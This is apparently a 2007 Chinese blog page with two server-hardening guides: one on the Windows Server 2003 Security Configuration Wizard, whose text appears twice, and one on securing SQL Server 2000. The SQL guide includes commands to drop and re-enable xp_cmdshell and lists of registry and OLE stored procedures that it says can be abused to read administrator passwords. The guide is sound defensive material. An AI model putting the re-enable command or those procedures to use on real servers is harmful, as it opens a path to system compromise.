Windows 2003服務(wù)器打造銅墻鐵壁
[ 2007-03-25 03:59:45 | 作者: sun ]
Windows Server 2003是大家最常用的服務(wù)器操作系統(tǒng)之一。雖然它提供了強(qiáng)大的網(wǎng)絡(luò)服務(wù)功能,并且簡單易用,但它的安全性一直困擾著眾多網(wǎng)管,如何在充分利用Windows Server 2003提供的各種服務(wù)的同時(shí),保證服務(wù)器的安全穩(wěn)定運(yùn)行,最大限度地抵御病毒和黑客的入侵。Windows Server 2003 SP1中文版補(bǔ)丁包的發(fā)布,恰好解決這個(gè)問題,它不但提供了對(duì)系統(tǒng)漏洞的修復(fù),還新增了很多易用的安全功能,如安全配置向?qū)В⊿CW)功能。利用SCW功能的“安全策略”可以最大限度增強(qiáng)服務(wù)器的安全,并且配置過程非常簡單,下面就一起來看吧!
厲兵秣馬 先裝“SCW”
大家都很清楚,Windows Server 2003系統(tǒng)為增強(qiáng)其安全性,默認(rèn)情況下,很多服務(wù)組件是不被安裝的,要想使用,必須手工安裝。“SCW”功能也是一樣,雖然你已經(jīng)成功安裝了補(bǔ)丁包SP1,但也需要手工安裝“安全配置向?qū)В⊿CW)”組件。
進(jìn)入“控制面板”后,運(yùn)行“添加或刪除程序”,然后切換到“添加/刪除Windows組件”頁。下面在“Windows組件向?qū)А睂?duì)話框中選中“安全配置向?qū)А边x項(xiàng),最后點(diǎn)擊“下一步”按鈕后,就能輕松完成“SCW”組件的安裝。
安裝過程就這么簡單,接下來就能根據(jù)自身需要,利用“SCW”配置安全策略,增強(qiáng)Windows Server 2003服務(wù)器安全。
配置“安全策略” 原來如此“簡單”
在Windows Server 2003服務(wù)器中,點(diǎn)擊“開始→運(yùn)行”后,在運(yùn)行對(duì)話框中執(zhí)行“SCW.exe”命令,就會(huì)彈出“安全配置向?qū)А睂?duì)話框,開始你的安全策略配置過程。當(dāng)然你也可以進(jìn)入“控制面板→管理工具”窗口后,執(zhí)行“安全配置向?qū)А笨旖莘绞絹韱⒂谩癝CW”。
1.新建第一個(gè)“安全策略”
如果你是第一次使用“SCW”功能,首先要為Windows Server 2003服務(wù)器新建一個(gè)安全策略,安全策略信息是被保存在格式為XML 的文件中的,并且它的默認(rèn)存儲(chǔ)位置是“C:\WINDOWS\security\msscw\Policies”。因此一個(gè)Windows Server 2003系統(tǒng)可以根據(jù)不同需要,創(chuàng)建多個(gè)“安全策略”文件,并且還可以對(duì)安全策略文件進(jìn)行修改,但一次只能應(yīng)用其中一個(gè)安全策略。
在“歡迎使用安全配置向?qū)А睂?duì)話框中點(diǎn)擊“下一步”按鈕,進(jìn)入到“配置操作”對(duì)話框,因?yàn)槭堑谝淮问褂谩癝CW”,這里要選擇“創(chuàng)建新的安全策略”單選項(xiàng),點(diǎn)擊“下一步”按鈕,就開始配置安全策略。
2.輕松配置“角色”
首先進(jìn)入“選擇服務(wù)器”對(duì)話框,在“服務(wù)器”欄中輸入要進(jìn)行安全配置的Windows Server 2003服務(wù)器的機(jī)器名或IP地址,點(diǎn)擊“下一步”按鈕后,“安全配置向?qū)А睍?huì)處理安全配置數(shù)據(jù)庫。
接著就進(jìn)入到“基于角色的服務(wù)配置”對(duì)話框。在基于角色的服務(wù)配置中,可以對(duì)Windows Server 2003服務(wù)器角色、客戶端角色、系統(tǒng)服務(wù)、應(yīng)用程序,以及管理選項(xiàng)等內(nèi)容進(jìn)行配置。
所謂服務(wù)器“角色”,其實(shí)就是提供各種服務(wù)的Windows Server 2003服務(wù)器,如文件服務(wù)器、打印服務(wù)器、DNS服務(wù)器和DHCP服務(wù)器等 , 一個(gè)Windows Server 2003服務(wù)器可以只提供一種服務(wù)器“角色”,也可以扮演多種服務(wù)器角色。點(diǎn)擊“下一步”按鈕后,就進(jìn)入到“選擇服務(wù)器角色”配置對(duì)話框,這時(shí)需要在“服務(wù)器角色列表框”中勾選你的Windows Server 2003服務(wù)器所扮演的角色。
注意:為了保證服務(wù)器的安全,只勾選你所需要的服務(wù)器角色即可,選擇多余的服務(wù)器角色選項(xiàng),會(huì)增加Windows Server 2003系統(tǒng)的安全隱患。如筆者的Windows Server 2003服務(wù)器只是作為文件服務(wù)器使用,這時(shí)只要選擇“文件服務(wù)器”選項(xiàng)即可。
進(jìn)入“選擇客戶端功能”標(biāo)簽頁,來配置Windows Server 2003服務(wù)器支持的“客戶端功能”,其實(shí)Windows Server 2003服務(wù)器的客戶端功能也很好理解,服務(wù)器在提供各種網(wǎng)絡(luò)服務(wù)的同時(shí),也需要一些客戶端功能的支持才行,如Microsoft網(wǎng)絡(luò)客戶端、DHCP客戶端和FTP客戶端等。根據(jù)需要,在列表框中勾選你所需的客戶端功能即可,同樣,對(duì)于不需要的客戶端功能選項(xiàng),建議你一定要取消對(duì)它的選擇。
接下來進(jìn)入到“選擇管理和其它選項(xiàng)”對(duì)話框,在這里選擇你需要的一些Windows Server 2003系統(tǒng)提供的管理和服務(wù)功能,操作方法是一樣的,只要在列表框中勾選你需要的管理選項(xiàng)即可。點(diǎn)擊“下一步”后,還要配置一些Windows Server 2003系統(tǒng)的額外服務(wù),這些額外服務(wù)一般都是第三方軟件提供的服務(wù)。
然后進(jìn)入到“處理未指定的服務(wù)”對(duì)話框,這里“未指定服務(wù)”是指,如果此安全策略文件被應(yīng)用到其它Windows Server 2003服務(wù)器中,而這個(gè)服務(wù)器中提供的一些服務(wù)沒有在安全配置數(shù)據(jù)庫中列出,那么這些沒被列出的服務(wù)該在什么狀態(tài)下運(yùn)行呢?在這里就可以指定它們的運(yùn)行狀態(tài),建議大家選中“不更改此服務(wù)的啟用模式”單選項(xiàng)。最后進(jìn)入到“確認(rèn)服務(wù)更改”對(duì)話框,對(duì)你的配置進(jìn)行最終確認(rèn)后,就完成了基于角色的服務(wù)配置。
3.配置網(wǎng)絡(luò)安全
以上完成了基于角色的服務(wù)配置。但Windows Server 2003服務(wù)器包含的各種服務(wù),都是通過某個(gè)或某些端口來提供服務(wù)內(nèi)容的,為了保證服務(wù)器的安全,Windows防火墻默認(rèn)是不會(huì)開放這些服務(wù)端口的。下面就可以通過“網(wǎng)絡(luò)安全”配置向?qū)ч_放各項(xiàng)服務(wù)所需的端口,這種向?qū)Щ渲眠^程與手工配置Windows防火墻相比,更加簡單、方便和安全。
在“網(wǎng)絡(luò)安全”對(duì)話框中,要開放選中的服務(wù)器角色,Windows Server 2003系統(tǒng)提供的管理功能以及第三方軟件提供的服務(wù)所使用的端口。點(diǎn)擊“下一步”按鈕后,在“打開端口并允許應(yīng)用程序”對(duì)話框中開放所需的端口,如FTP服務(wù)器所需的“20和21”端口,IIS服務(wù)所需的“80”端口等,這里要切記“最小化”原則,只要在列表框中選擇要必須開放的端口選項(xiàng)即可,最后確認(rèn)端口配置,這里要注意:其它不需要使用的端口,建議大家不要開放,以免給Windows Server 2003服務(wù)器造成安全隱患。
4.注冊(cè)表設(shè)置
Windows Server 2003服務(wù)器在網(wǎng)絡(luò)中為用戶提供各種服務(wù),但用戶與服務(wù)器的通信中很有可能包含“不懷好意”的訪問,如黑客和病毒攻擊。如何保證服務(wù)器的安全,最大限度地限制非法用戶訪問,通過“注冊(cè)表設(shè)置”向?qū)Ь湍茌p松實(shí)現(xiàn)。
利用注冊(cè)表設(shè)置向?qū)В薷腤indows Server 2003服務(wù)器注冊(cè)表中某些特殊的鍵值,來嚴(yán)格限制用戶的訪問權(quán)限。用戶只要根據(jù)設(shè)置向?qū)崾荆约胺?wù)器的服務(wù)需要,分別對(duì)“要求SMB安全簽名”、“出站身份驗(yàn)證方法”、“入站身份驗(yàn)證方法”進(jìn)行嚴(yán)格設(shè)置,就能最大限度保證Windows Server 2003服務(wù)器的安全運(yùn)行,并且免去手工修改注冊(cè)表的麻煩。
5.啟用“審核策略”
聰明的網(wǎng)管會(huì)利用日志功能來分析服務(wù)器的運(yùn)行狀況,因此適當(dāng)?shù)膯⒂脤徍瞬呗允欠浅V匾摹CW功能也充分的考慮到這些,利用向?qū)Щ牟僮骶湍茌p松啟用審核策略。
在“系統(tǒng)審核策略”配置對(duì)話框中要合理選擇審核目標(biāo),畢竟日志記錄過多的事件會(huì)影響服務(wù)器的性能,因此建議用戶選擇“審核成功的操作”選項(xiàng)。當(dāng)然如果有特殊需要,也可以選擇其它選項(xiàng)。如“不審核”或“審核成功或不成功的操作”選項(xiàng)。
6.增強(qiáng)IIS安全
IIS服務(wù)器是網(wǎng)絡(luò)中最為廣泛應(yīng)用的一種服務(wù),也是Windows系統(tǒng)中最易受攻擊的服務(wù)。如何來保證IIS服務(wù)器的安全運(yùn)行,最大限度免受黑客和病毒的攻擊,這也是SCW功能要解決的一個(gè)問題。利用“安全配置向?qū)А笨梢暂p松的增強(qiáng)IIS服務(wù)器的安全,保證其穩(wěn)定、安全運(yùn)行。
在“Internet信息服務(wù)”配置對(duì)話框中,通過配置向?qū)В瑏磉x擇你要啟用的Web服務(wù)擴(kuò)展、要保持的虛擬目錄,以及設(shè)置匿名用戶對(duì)內(nèi)容文件的寫權(quán)限。這樣IIS服務(wù)器的安全性就大大增強(qiáng)。
小提示:如果你的Windows Server 2003服務(wù)器沒有安裝、運(yùn)行IIS服務(wù),則在SCW配置過程中不會(huì)出現(xiàn)IIS安全配置部分。
完成以上幾步配置后,進(jìn)入到保存安全策略對(duì)話框,首先在“安全策略文件名”對(duì)話框中為你配置的安全策略起個(gè)名字,最后在“應(yīng)用安全策略”對(duì)話框中選擇“現(xiàn)在應(yīng)用”選項(xiàng),使配置的安全策略立即生效。
利用SCW增強(qiáng)Windows Server 2003服務(wù)器的安全性能就這么簡單,所有的參數(shù)配置都是通過向?qū)Щ瘜?duì)話框完成的,免去了手工繁瑣的配置過程,SCW功能的確是安全性和易用性有效的結(jié)合點(diǎn)。如果你的Windows Server 2003系統(tǒng)已經(jīng)安裝了SP1補(bǔ)丁包,不妨試試SCW吧!
厲兵秣馬 先裝“SCW”
大家都很清楚,Windows Server 2003系統(tǒng)為增強(qiáng)其安全性,默認(rèn)情況下,很多服務(wù)組件是不被安裝的,要想使用,必須手工安裝。“SCW”功能也是一樣,雖然你已經(jīng)成功安裝了補(bǔ)丁包SP1,但也需要手工安裝“安全配置向?qū)В⊿CW)”組件。
進(jìn)入“控制面板”后,運(yùn)行“添加或刪除程序”,然后切換到“添加/刪除Windows組件”頁。下面在“Windows組件向?qū)А睂?duì)話框中選中“安全配置向?qū)А边x項(xiàng),最后點(diǎn)擊“下一步”按鈕后,就能輕松完成“SCW”組件的安裝。
安裝過程就這么簡單,接下來就能根據(jù)自身需要,利用“SCW”配置安全策略,增強(qiáng)Windows Server 2003服務(wù)器安全。
配置“安全策略” 原來如此“簡單”
在Windows Server 2003服務(wù)器中,點(diǎn)擊“開始→運(yùn)行”后,在運(yùn)行對(duì)話框中執(zhí)行“SCW.exe”命令,就會(huì)彈出“安全配置向?qū)А睂?duì)話框,開始你的安全策略配置過程。當(dāng)然你也可以進(jìn)入“控制面板→管理工具”窗口后,執(zhí)行“安全配置向?qū)А笨旖莘绞絹韱⒂谩癝CW”。
1.新建第一個(gè)“安全策略”
如果你是第一次使用“SCW”功能,首先要為Windows Server 2003服務(wù)器新建一個(gè)安全策略,安全策略信息是被保存在格式為XML 的文件中的,并且它的默認(rèn)存儲(chǔ)位置是“C:\WINDOWS\security\msscw\Policies”。因此一個(gè)Windows Server 2003系統(tǒng)可以根據(jù)不同需要,創(chuàng)建多個(gè)“安全策略”文件,并且還可以對(duì)安全策略文件進(jìn)行修改,但一次只能應(yīng)用其中一個(gè)安全策略。
在“歡迎使用安全配置向?qū)А睂?duì)話框中點(diǎn)擊“下一步”按鈕,進(jìn)入到“配置操作”對(duì)話框,因?yàn)槭堑谝淮问褂谩癝CW”,這里要選擇“創(chuàng)建新的安全策略”單選項(xiàng),點(diǎn)擊“下一步”按鈕,就開始配置安全策略。
2.輕松配置“角色”
首先進(jìn)入“選擇服務(wù)器”對(duì)話框,在“服務(wù)器”欄中輸入要進(jìn)行安全配置的Windows Server 2003服務(wù)器的機(jī)器名或IP地址,點(diǎn)擊“下一步”按鈕后,“安全配置向?qū)А睍?huì)處理安全配置數(shù)據(jù)庫。
接著就進(jìn)入到“基于角色的服務(wù)配置”對(duì)話框。在基于角色的服務(wù)配置中,可以對(duì)Windows Server 2003服務(wù)器角色、客戶端角色、系統(tǒng)服務(wù)、應(yīng)用程序,以及管理選項(xiàng)等內(nèi)容進(jìn)行配置。
所謂服務(wù)器“角色”,其實(shí)就是提供各種服務(wù)的Windows Server 2003服務(wù)器,如文件服務(wù)器、打印服務(wù)器、DNS服務(wù)器和DHCP服務(wù)器等 , 一個(gè)Windows Server 2003服務(wù)器可以只提供一種服務(wù)器“角色”,也可以扮演多種服務(wù)器角色。點(diǎn)擊“下一步”按鈕后,就進(jìn)入到“選擇服務(wù)器角色”配置對(duì)話框,這時(shí)需要在“服務(wù)器角色列表框”中勾選你的Windows Server 2003服務(wù)器所扮演的角色。
注意:為了保證服務(wù)器的安全,只勾選你所需要的服務(wù)器角色即可,選擇多余的服務(wù)器角色選項(xiàng),會(huì)增加Windows Server 2003系統(tǒng)的安全隱患。如筆者的Windows Server 2003服務(wù)器只是作為文件服務(wù)器使用,這時(shí)只要選擇“文件服務(wù)器”選項(xiàng)即可。
進(jìn)入“選擇客戶端功能”標(biāo)簽頁,來配置Windows Server 2003服務(wù)器支持的“客戶端功能”,其實(shí)Windows Server 2003服務(wù)器的客戶端功能也很好理解,服務(wù)器在提供各種網(wǎng)絡(luò)服務(wù)的同時(shí),也需要一些客戶端功能的支持才行,如Microsoft網(wǎng)絡(luò)客戶端、DHCP客戶端和FTP客戶端等。根據(jù)需要,在列表框中勾選你所需的客戶端功能即可,同樣,對(duì)于不需要的客戶端功能選項(xiàng),建議你一定要取消對(duì)它的選擇。
接下來進(jìn)入到“選擇管理和其它選項(xiàng)”對(duì)話框,在這里選擇你需要的一些Windows Server 2003系統(tǒng)提供的管理和服務(wù)功能,操作方法是一樣的,只要在列表框中勾選你需要的管理選項(xiàng)即可。點(diǎn)擊“下一步”后,還要配置一些Windows Server 2003系統(tǒng)的額外服務(wù),這些額外服務(wù)一般都是第三方軟件提供的服務(wù)。
然后進(jìn)入到“處理未指定的服務(wù)”對(duì)話框,這里“未指定服務(wù)”是指,如果此安全策略文件被應(yīng)用到其它Windows Server 2003服務(wù)器中,而這個(gè)服務(wù)器中提供的一些服務(wù)沒有在安全配置數(shù)據(jù)庫中列出,那么這些沒被列出的服務(wù)該在什么狀態(tài)下運(yùn)行呢?在這里就可以指定它們的運(yùn)行狀態(tài),建議大家選中“不更改此服務(wù)的啟用模式”單選項(xiàng)。最后進(jìn)入到“確認(rèn)服務(wù)更改”對(duì)話框,對(duì)你的配置進(jìn)行最終確認(rèn)后,就完成了基于角色的服務(wù)配置。
3.配置網(wǎng)絡(luò)安全
以上完成了基于角色的服務(wù)配置。但Windows Server 2003服務(wù)器包含的各種服務(wù),都是通過某個(gè)或某些端口來提供服務(wù)內(nèi)容的,為了保證服務(wù)器的安全,Windows防火墻默認(rèn)是不會(huì)開放這些服務(wù)端口的。下面就可以通過“網(wǎng)絡(luò)安全”配置向?qū)ч_放各項(xiàng)服務(wù)所需的端口,這種向?qū)Щ渲眠^程與手工配置Windows防火墻相比,更加簡單、方便和安全。
在“網(wǎng)絡(luò)安全”對(duì)話框中,要開放選中的服務(wù)器角色,Windows Server 2003系統(tǒng)提供的管理功能以及第三方軟件提供的服務(wù)所使用的端口。點(diǎn)擊“下一步”按鈕后,在“打開端口并允許應(yīng)用程序”對(duì)話框中開放所需的端口,如FTP服務(wù)器所需的“20和21”端口,IIS服務(wù)所需的“80”端口等,這里要切記“最小化”原則,只要在列表框中選擇要必須開放的端口選項(xiàng)即可,最后確認(rèn)端口配置,這里要注意:其它不需要使用的端口,建議大家不要開放,以免給Windows Server 2003服務(wù)器造成安全隱患。
4.注冊(cè)表設(shè)置
Windows Server 2003服務(wù)器在網(wǎng)絡(luò)中為用戶提供各種服務(wù),但用戶與服務(wù)器的通信中很有可能包含“不懷好意”的訪問,如黑客和病毒攻擊。如何保證服務(wù)器的安全,最大限度地限制非法用戶訪問,通過“注冊(cè)表設(shè)置”向?qū)Ь湍茌p松實(shí)現(xiàn)。
利用注冊(cè)表設(shè)置向?qū)В薷腤indows Server 2003服務(wù)器注冊(cè)表中某些特殊的鍵值,來嚴(yán)格限制用戶的訪問權(quán)限。用戶只要根據(jù)設(shè)置向?qū)崾荆约胺?wù)器的服務(wù)需要,分別對(duì)“要求SMB安全簽名”、“出站身份驗(yàn)證方法”、“入站身份驗(yàn)證方法”進(jìn)行嚴(yán)格設(shè)置,就能最大限度保證Windows Server 2003服務(wù)器的安全運(yùn)行,并且免去手工修改注冊(cè)表的麻煩。
5.啟用“審核策略”
聰明的網(wǎng)管會(huì)利用日志功能來分析服務(wù)器的運(yùn)行狀況,因此適當(dāng)?shù)膯⒂脤徍瞬呗允欠浅V匾摹CW功能也充分的考慮到這些,利用向?qū)Щ牟僮骶湍茌p松啟用審核策略。
在“系統(tǒng)審核策略”配置對(duì)話框中要合理選擇審核目標(biāo),畢竟日志記錄過多的事件會(huì)影響服務(wù)器的性能,因此建議用戶選擇“審核成功的操作”選項(xiàng)。當(dāng)然如果有特殊需要,也可以選擇其它選項(xiàng)。如“不審核”或“審核成功或不成功的操作”選項(xiàng)。
6.增強(qiáng)IIS安全
IIS服務(wù)器是網(wǎng)絡(luò)中最為廣泛應(yīng)用的一種服務(wù),也是Windows系統(tǒng)中最易受攻擊的服務(wù)。如何來保證IIS服務(wù)器的安全運(yùn)行,最大限度免受黑客和病毒的攻擊,這也是SCW功能要解決的一個(gè)問題。利用“安全配置向?qū)А笨梢暂p松的增強(qiáng)IIS服務(wù)器的安全,保證其穩(wěn)定、安全運(yùn)行。
在“Internet信息服務(wù)”配置對(duì)話框中,通過配置向?qū)В瑏磉x擇你要啟用的Web服務(wù)擴(kuò)展、要保持的虛擬目錄,以及設(shè)置匿名用戶對(duì)內(nèi)容文件的寫權(quán)限。這樣IIS服務(wù)器的安全性就大大增強(qiáng)。
小提示:如果你的Windows Server 2003服務(wù)器沒有安裝、運(yùn)行IIS服務(wù),則在SCW配置過程中不會(huì)出現(xiàn)IIS安全配置部分。
完成以上幾步配置后,進(jìn)入到保存安全策略對(duì)話框,首先在“安全策略文件名”對(duì)話框中為你配置的安全策略起個(gè)名字,最后在“應(yīng)用安全策略”對(duì)話框中選擇“現(xiàn)在應(yīng)用”選項(xiàng),使配置的安全策略立即生效。
利用SCW增強(qiáng)Windows Server 2003服務(wù)器的安全性能就這么簡單,所有的參數(shù)配置都是通過向?qū)Щ瘜?duì)話框完成的,免去了手工繁瑣的配置過程,SCW功能的確是安全性和易用性有效的結(jié)合點(diǎn)。如果你的Windows Server 2003系統(tǒng)已經(jīng)安裝了SP1補(bǔ)丁包,不妨試試SCW吧!
九大措施安全配置SQLServer2000數(shù)據(jù)庫
[ 2007-03-25 03:59:32 | 作者: sun ]
數(shù)據(jù)庫是電子商務(wù)、金融以及ERP系統(tǒng)的基礎(chǔ),通常都保存著重要的商業(yè)伙伴和客戶信息。大多數(shù)企業(yè)、組織以及政府部門的電子數(shù)據(jù)都保存在各種數(shù)據(jù)庫中,他們用這些數(shù)據(jù)庫保存一些個(gè)人資料,比如員工薪水、個(gè)人資料等等。數(shù)據(jù)庫服務(wù)器還掌握著敏感的金融數(shù)據(jù)。包括交易記錄、商業(yè)事務(wù)和帳號(hào)數(shù)據(jù),戰(zhàn)略上的或者專業(yè)的信息,比如專利和工程數(shù)據(jù),甚至市場計(jì)劃等等應(yīng)該保護(hù)起來防止競爭者和其他非法者獲取的資料。數(shù)據(jù)完整性和合法存取會(huì)受到很多方面的安全威脅,包括密碼策略、系統(tǒng)后門、數(shù)據(jù)庫操作以及本身的安全方案。但是數(shù)據(jù)庫通常沒有象操作系統(tǒng)和網(wǎng)絡(luò)這樣在安全性上受到重視。
微軟的SQL Server是一種廣泛使用的數(shù)據(jù)庫,很多電子商務(wù)網(wǎng)站、企業(yè)內(nèi)部信息化平臺(tái)等都是基于SQL Server上的,但是數(shù)據(jù)庫的安全性還沒有被人們更系統(tǒng)的安全性等同起來,多數(shù)管理員認(rèn)為只要把網(wǎng)絡(luò)和操作系統(tǒng)的安全搞好了,那么所有的應(yīng)用程序也就安全了。大多數(shù)系統(tǒng)管理員對(duì)數(shù)據(jù)庫不熟悉而數(shù)據(jù)庫管理員有對(duì)安全問題關(guān)心太少,而且一些安全公司也忽略數(shù)據(jù)庫安全,這就使數(shù)據(jù)庫的安全問題更加嚴(yán)峻了。數(shù)據(jù)庫系統(tǒng)中存在的安全漏洞和不當(dāng)?shù)呐渲猛ǔ?huì)造成嚴(yán)重的后果,而且都難以發(fā)現(xiàn)。數(shù)據(jù)庫應(yīng)用程序通常同操作系統(tǒng)的最高管理員密切相關(guān)。廣泛SQL Server數(shù)據(jù)庫又是屬于“端口”型的數(shù)據(jù)庫,這就表示任何人都能夠用分析工具試圖連接到數(shù)據(jù)庫上,從而繞過操作系統(tǒng)的安全機(jī)制,進(jìn)而闖入系統(tǒng)、破壞和竊取數(shù)據(jù)資料,甚至破壞整個(gè)系統(tǒng)。
這里,我們主要談?wù)撚嘘P(guān)SQL Server2000數(shù)據(jù)庫的安全配置以及一些相關(guān)的安全和使用上的問題。
在進(jìn)行SQL Server 2000數(shù)據(jù)庫的安全配置之前,首先你必須對(duì)操作系統(tǒng)進(jìn)行安全配置,保證你的操作系統(tǒng)處于安全狀態(tài)。然后對(duì)你要使用的操作數(shù)據(jù)庫軟件(程序)進(jìn)行必要的安全審核,比如對(duì)ASP、PHP等腳本,這是很多基于數(shù)據(jù)庫的WEB應(yīng)用常出現(xiàn)的安全隱患,對(duì)于腳本主要是一個(gè)過濾問題,需要過濾一些類似 , ‘ ; @ / 等字符,防止破壞者構(gòu)造惡意的SQL語句。接著,安裝SQL Server2000后請(qǐng)打上補(bǔ)丁sp1以及最新的sp2。
下載地址是:http://www.microsoft.com/sql/downloads/2000/sp1.asp 和 http://www.microsoft.com/sql/downloads/2000/sp2.asp
在做完上面三步基礎(chǔ)之后,我們?cè)賮碛懻揝QL Server的安全配置。
1、使用安全的密碼策略
我們把密碼策略擺在所有安全配置的第一步,請(qǐng)注意,很多數(shù)據(jù)庫帳號(hào)的密碼過于簡單,這跟系統(tǒng)密碼過于簡單是一個(gè)道理。對(duì)于sa更應(yīng)該注意,同時(shí)不要讓sa帳號(hào)的密碼寫于應(yīng)用程序或者腳本中。健壯的密碼是安全的第一步!
SQL Server2000安裝的時(shí)候,如果是使用混合模式,那么就需要輸入sa的密碼,除非你確認(rèn)必須使用空密碼。這比以前的版本有所改進(jìn)。
同時(shí)養(yǎng)成定期修改密碼的好習(xí)慣。數(shù)據(jù)庫管理員應(yīng)該定期查看是否有不符合密碼要求的帳號(hào)。比如使用下面的SQL語句:
Use master
Select name,Password from syslogins where password is null
2、使用安全的帳號(hào)策略
由于SQL Server不能更改sa用戶名稱,也不能刪除這個(gè)超級(jí)用戶,所以,我們必須對(duì)這個(gè)帳號(hào)進(jìn)行最強(qiáng)的保護(hù),當(dāng)然,包括使用一個(gè)非常強(qiáng)壯的密碼,最好不要在數(shù)據(jù)庫應(yīng)用中使用sa帳號(hào),只有當(dāng)沒有其它方法登錄到 SQL Server 實(shí)例(例如,當(dāng)其它系統(tǒng)管理員不可用或忘記了密碼)時(shí)才使用 sa。建議數(shù)據(jù)庫管理員新建立一個(gè)擁有與sa一樣權(quán)限的超級(jí)用戶來管理數(shù)據(jù)庫。安全的帳號(hào)策略還包括不要讓管理員權(quán)限的帳號(hào)泛濫。
SQL Server的認(rèn)證模式有Windows身份認(rèn)證和混合身份認(rèn)證兩種。如果數(shù)據(jù)庫管理員不希望操作系統(tǒng)管理員來通過操作系統(tǒng)登陸來接觸數(shù)據(jù)庫的話,可以在帳號(hào)管理中把系統(tǒng)帳號(hào)“BUILTINAdministrators”刪除。不過這樣做的結(jié)果是一旦sa帳號(hào)忘記密碼的話,就沒有辦法來恢復(fù)了。
很多主機(jī)使用數(shù)據(jù)庫應(yīng)用只是用來做查詢、修改等簡單功能的,請(qǐng)根據(jù)實(shí)際需要分配帳號(hào),并賦予僅僅能夠滿足應(yīng)用要求和需要的權(quán)限。比如,只要查詢功能的,那么就使用一個(gè)簡單的public帳號(hào)能夠select就可以了。
3、加強(qiáng)數(shù)據(jù)庫日志的記錄
審核數(shù)據(jù)庫登錄事件的“失敗和成功”,在實(shí)例屬性中選擇“安全性”,將其中的審核級(jí)別選定為全部,這樣在數(shù)據(jù)庫系統(tǒng)和操作系統(tǒng)日志里面,就詳細(xì)記錄了所有帳號(hào)的登錄事件。
請(qǐng)定期查看SQL Server日志檢查是否有可疑的登錄事件發(fā)生,或者使用DOS命令。
findstr /C:"登錄" d:Microsoft SQL ServerMSSQLLOG*.*
4、管理擴(kuò)展存儲(chǔ)過程
對(duì)存儲(chǔ)過程進(jìn)行大手術(shù),并且對(duì)帳號(hào)調(diào)用擴(kuò)展存儲(chǔ)過程的權(quán)限要慎重。其實(shí)在多數(shù)應(yīng)用中根本用不到多少系統(tǒng)的存儲(chǔ)過程,而SQL Server的這么多系統(tǒng)存儲(chǔ)過程只是用來適應(yīng)廣大用戶需求的,所以請(qǐng)刪除不必要的存儲(chǔ)過程,因?yàn)橛行┫到y(tǒng)的存儲(chǔ)過程能很容易地被人利用起來提升權(quán)限或進(jìn)行破壞。
如果你不需要擴(kuò)展存儲(chǔ)過程xp_cmdshell請(qǐng)把它去掉。使用這個(gè)SQL語句:
use master
sp_dropextendedproc 'xp_cmdshell'
xp_cmdshell是進(jìn)入操作系統(tǒng)的最佳捷徑,是數(shù)據(jù)庫留給操作系統(tǒng)的一個(gè)大后門。如果你需要這個(gè)存儲(chǔ)過程,請(qǐng)用這個(gè)語句也可以恢復(fù)過來。
sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
如果你不需要請(qǐng)丟棄OLE自動(dòng)存儲(chǔ)過程(會(huì)造成管理器中的某些特征不能使用),這些過程包括如下:
Sp_OACreate Sp_OADestroy Sp_OAGetErrorInfo Sp_OAGetProperty
Sp_OAMethod Sp_OASetProperty Sp_OAStop
去掉不需要的注冊(cè)表訪問的存儲(chǔ)過程,注冊(cè)表存儲(chǔ)過程甚至能夠讀出操作系統(tǒng)管理員的密碼來,如下:
Xp_regaddmultistring Xp_regdeletekey Xp_regdeletevalue Xp_regenumvalues
Xp_regread Xp_regremovemultistring Xp_regwrite
還有一些其他的擴(kuò)展存儲(chǔ)過程,你也最好檢查檢查。
在處理存儲(chǔ)過程的時(shí)候,請(qǐng)確認(rèn)一下,避免造成對(duì)數(shù)據(jù)庫或應(yīng)用程序的傷害。
5、使用協(xié)議加密
SQL Server 2000使用的Tabular Data Stream協(xié)議來進(jìn)行網(wǎng)絡(luò)數(shù)據(jù)交換,如果不加密的話,所有的網(wǎng)絡(luò)傳輸都是明文的,包括密碼、數(shù)據(jù)庫內(nèi)容等等,這是一個(gè)很大的安全威脅。能被人在網(wǎng)絡(luò)中截獲到他們需要的東西,包括數(shù)據(jù)庫帳號(hào)和密碼。所以,在條件容許情況下,最好使用SSL來加密協(xié)議,當(dāng)然,你需要一個(gè)證書來支持。
6、不要讓人隨便探測到你的TCP/IP端口
默認(rèn)情況下,SQL Server使用1433端口監(jiān)聽,很多人都說SQL Server配置的時(shí)候要把這個(gè)端口改變,這樣別人就不能很容易地知道使用的什么端口了。可惜,通過微軟未公開的1434端口的UDP探測可以很容易知道SQL Server使用的什么TCP/IP端口了。
不過微軟還是考慮到了這個(gè)問題,畢竟公開而且開放的端口會(huì)引起不必要的麻煩。在實(shí)例屬性中選擇TCP/IP協(xié)議的屬性。選擇隱藏 SQL Server 實(shí)例。如果隱藏了 SQL Server 實(shí)例,則將禁止對(duì)試圖枚舉網(wǎng)絡(luò)上現(xiàn)有的 SQL Server 實(shí)例的客戶端所發(fā)出的廣播作出響應(yīng)。這樣,別人就不能用1434來探測你的TCP/IP端口了(除非用Port Scan)。
7、修改TCP/IP使用的端口
請(qǐng)?jiān)谏弦徊脚渲玫幕A(chǔ)上,更改原默認(rèn)的1433端口。在實(shí)例屬性中選擇網(wǎng)絡(luò)配置中的TCP/IP協(xié)議的屬性,將TCP/IP使用的默認(rèn)端口變?yōu)槠渌丝凇?
8、拒絕來自1434端口的探測
由于1434端口探測沒有限制,能夠被別人探測到一些數(shù)據(jù)庫信息,而且還可能遭到DOS攻擊讓數(shù)據(jù)庫服務(wù)器的CPU負(fù)荷增大,所以對(duì)Windows 2000操作系統(tǒng)來說,在IPSec過濾拒絕掉1434端口的UDP通訊,可以盡可能地隱藏你的SQL Server。
9、對(duì)網(wǎng)絡(luò)連接進(jìn)行IP限制
SQL Server 2000數(shù)據(jù)庫系統(tǒng)本身沒有提供網(wǎng)絡(luò)連接的安全解決辦法,但是Windows 2000提供了這樣的安全機(jī)制。使用操作系統(tǒng)自己的IPSec可以實(shí)現(xiàn)IP數(shù)據(jù)包的安全性。請(qǐng)對(duì)IP連接進(jìn)行限制,只保證自己的IP能夠訪問,也拒絕其他IP進(jìn)行的端口連接,把來自網(wǎng)絡(luò)上的安全威脅進(jìn)行有效的控制。
關(guān)于IPSec的使用請(qǐng)參看:http://www.microsoft.com/china/technet/security/ipsecloc.asp
上面主要介紹的一些SQL Server的安全配置,經(jīng)過以上的配置,可以讓SQL Server本身具備足夠的安全防范能力。當(dāng)然,更主要的還是要加強(qiáng)內(nèi)部的安全控制和管理員的安全培訓(xùn),而且安全性問題是一個(gè)長期的解決過程,還需要以后進(jìn)行更多的安全維護(hù)。
